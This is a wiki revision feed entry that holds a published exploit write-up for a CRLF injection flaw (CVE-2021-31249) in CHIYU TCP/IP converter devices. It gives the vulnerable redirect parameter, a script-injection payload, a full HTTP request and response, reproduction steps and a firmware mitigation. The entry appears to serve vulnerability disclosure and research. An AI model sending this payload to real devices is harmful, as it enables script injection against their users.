https://pwnwiki.com/index.php?action=history&feed=atom&title=CHIYU_TCP%2FIP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E 2026-04-09T00:24:32Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CHIYU_TCP/IP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=3887&oldid=prev 2021-06-02T01:13:21Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech....&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection<br /> # Date: May 31 2021<br /> # Exploit Author: sirpedrotavares<br /> # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html<br /> # Software Link: https://www.chiyu-tech.com/category-hardware.html<br /> # Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions &lt; June 2021<br /> # Tested on: BF-430, BF-431, and BF-450M<br /> # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks<br /> <br /> Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.<br /> CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N<br /> URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249<br /> <br /> Affected parameter: redirect=Component: all the CGI components<br /> Payload: %0d%0a%0d%0a&lt;script&gt;alert(document.domain)&lt;/script&gt;<br /> <br /> ====HTTP request======<br /> GET<br /> /man.cgi?redirect=setting.htm%0d%0a%0d%0a&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;failure=fail.htm&amp;type=dev_name_apply&amp;http_block=0&amp;TF_ip0=192&amp;TF_ip1=168&amp;TF_ip2=200&amp;TF_ip3=200&amp;TF_port=&amp;TF_port=&amp;B_mac_apply=APPLY<br /> HTTP/1.1<br /> Host: 192.168.187.12<br /> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101<br /> Firefox/68.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Referer: http://192.168.187.12/manage.htm<br /> Authorization: Basic OmFkbWlu<br /> Connection: close<br /> Upgrade-Insecure-Requests: 1<br /> <br /> ======HTTP response========<br /> HTTP/1.1 302 Found<br /> Location: setting.htm<br /> &lt;script&gt;alert(document.domain)&lt;/script&gt;<br /> Content-Length: 0<br /> Content-Type: text/html<br /> <br /> <br /> Steps to reproduce:<br /> 1. Navigate to the vulnerable device<br /> 2. Make a GET request to all CGI components<br /> 3. Append the payload at the end of the vulnerable parameter (redirect )<br /> 4. Submit the request and observe payload execution<br /> <br /> <br /> Mitigation: The latest version of the CHIYU firmware should be installed<br /> to mitigate this vulnerability.<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki